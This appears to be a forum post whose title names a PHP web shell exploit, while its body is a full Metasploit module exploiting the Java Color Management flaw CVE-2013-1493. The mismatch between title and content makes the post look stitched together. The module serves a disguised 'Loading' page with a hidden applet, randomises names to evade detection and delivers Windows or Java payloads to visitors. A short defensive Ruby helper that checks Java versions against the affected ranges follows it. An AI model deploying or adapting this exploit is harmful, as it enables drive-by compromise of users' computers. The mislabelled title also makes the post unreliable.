
STUNSHELL PHP Web Shell Remote Code Execution

Original poster | Posted on 2013-4-4 17:31:17
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##

require 'msf/core'
require 'rex'

class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::HttpServer::HTML
  include Msf::Exploit::EXE
  include Msf::Exploit::Remote::BrowserAutopwn

  autopwn_info({ :javascript => false })

  def initialize( info = {} )
    super( update_info( info,
      'Name'        => 'Java CMM Remote Code Execution',
      'Description' => %q{
        This module abuses the Color Management classes from a Java Applet to run
        arbitrary Java code outside of the sandbox as exploited in the wild in February
        and March of 2013. The vulnerability affects Java version 7u15 and earlier and 6u41
        and earlier and has been tested successfully on Windows XP SP3 and Windows 7 SP1
        systems. This exploit doesn't bypass click-to-play, so the user must accept the java
        warning in order to run the malicious applet.
      },
      'License'     => MSF_LICENSE,
      'Author'      =>
        [
          'Unknown', # Vulnerability discovery and Exploit
          'juan vazquez' # Metasploit module (just ported the published exploit)
        ],
      'References'  =>
        [
          [ 'CVE', '2013-1493' ],
          [ 'OSVDB', '90737' ],
          [ 'BID', '58238' ],
          [ 'URL', 'https://blogs.oracle.com/security/entry/security_alert_cve_2013_1493' ],
          [ 'URL', 'http://www.oracle.com/technetwork/topics/security/alert-cve-2013-1493-1915081.html' ],
          [ 'URL', 'http://pastie.org/pastes/6581034' ]
        ],
      'Platform'    => [ 'win', 'java' ],
      'Payload'     => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true },
      'Targets'     =>
        [
          [ 'Generic (Java Payload)',
            {
              'Platform' => 'java',
              'Arch'     => ARCH_JAVA
            }
          ],
          [ 'Windows x86 (Native Payload)',
            {
              'Platform' => 'win',
              'Arch'     => ARCH_X86
            }
          ]
        ],
      'DefaultTarget'  => 1,
      'DisclosureDate' => 'Mar 01 2013'
    ))
  end

  def setup
    # Pre-built class files are loaded from the framework's data directory.
    path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2013-1493", "Init.class")
    @init_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }
    path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2013-1493", "Leak.class")
    @leak_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }
    path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2013-1493", "MyBufferedImage.class")
    @buffered_image_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }
    path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2013-1493", "MyColorSpace.class")
    @color_space_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }

    @init_class_name = rand_text_alpha("Init".length)
    @init_class.gsub!("Init", @init_class_name)

    super
  end

  def on_request_uri(cli, request)
    print_status("handling request for #{request.uri}")

    case request.uri
    when /\.jar$/i
      jar = payload.encoded_jar
      jar.add_file("#{@init_class_name}.class", @init_class)
      jar.add_file("Leak.class", @leak_class)
      jar.add_file("MyBufferedImage.class", @buffered_image_class)
      jar.add_file("MyColorSpace.class", @color_space_class)

      metasploit_str = rand_text_alpha("metasploit".length)
      payload_str = rand_text_alpha("payload".length)
      jar.entries.each { |entry|
        entry.name.gsub!("metasploit", metasploit_str)
        entry.name.gsub!("Payload", payload_str)
        entry.data = entry.data.gsub("metasploit", metasploit_str)
        entry.data = entry.data.gsub("Payload", payload_str)
      }
      jar.build_manifest

      send_response(cli, jar, { 'Content-Type' => "application/octet-stream" })
    when /\/$/
      payload = regenerate_payload(cli)
      if not payload
        print_error("Failed to generate the payload.")
        send_not_found(cli)
        return
      end
      send_response_html(cli, generate_html, { 'Content-Type' => 'text/html' })
    else
      send_redirect(cli, get_resource() + '/', '')
    end
  end

  def generate_html
    html  = %Q|<html><head><title>Loading, Please Wait...</title></head>|
    html += %Q|<body><center><p>Loading, Please Wait...</p></center>|
    html += %Q|<applet archive="#{rand_text_alpha(8)}.jar" code="#{@init_class_name}.class" width="1" height="1">|
    html += %Q|</applet></body></html>|
    return html
  end

end
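Added example (not part of the module above and not Metasploit code): a small audit helper that classifies Java version strings against the affected ranges the module description states, 7u15 and earlier and 6u41 and earlier. The host inventory and its version strings are constructed sample data.

```ruby
# Matches the "1.<major>.<minor>_<update>" form used by Java 6/7 runtimes,
# either bare ("1.7.0_15") or as the first line of `java -version` output
# ('java version "1.7.0_15"').
JAVA_VERSION_RE = /(?:^|")1\.(\d+)\.(\d+)(?:_(\d+))?/

# Last affected update level per major release, taken from the module
# description ("7u15 and earlier", "6u41 and earlier").
LAST_AFFECTED_UPDATE = { 7 => 15, 6 => 41 }.freeze

def parse_java_version(text)
  m = JAVA_VERSION_RE.match(text.to_s)
  return nil unless m
  { major: m[1].to_i, minor: m[2].to_i, update: (m[3] || "0").to_i }
end

# Returns :affected or :not_affected for Java 6 and 7 runtimes, and :unknown
# when the string cannot be parsed or the major release is not one the
# module description covers (so it is neither cleared nor flagged).
def cve_2013_1493_status(text)
  v = parse_java_version(text)
  return :unknown unless v
  last = LAST_AFFECTED_UPDATE[v[:major]]
  return :unknown unless last
  v[:update] <= last ? :affected : :not_affected
end

# Constructed sample of what a fleet inventory might report per host.
SAMPLE_HOSTS = {
  "ws-01" => 'java version "1.7.0_15"',
  "ws-02" => 'java version "1.7.0_17"',
  "ws-03" => '1.6.0_41',
  "ws-04" => 'java version "1.6.0_43"',
  "ws-05" => 'openjdk version "1.8.0_45"',
  "ws-06" => 'not installed',
}.freeze

# Map every host to its status so the affected ones can be listed.
def report(hosts = SAMPLE_HOSTS)
  hosts.transform_values { |v| cve_2013_1493_status(v) }
end

if __FILE__ == $0
  report.each { |host, status| puts "#{host}: #{status}" }
end
```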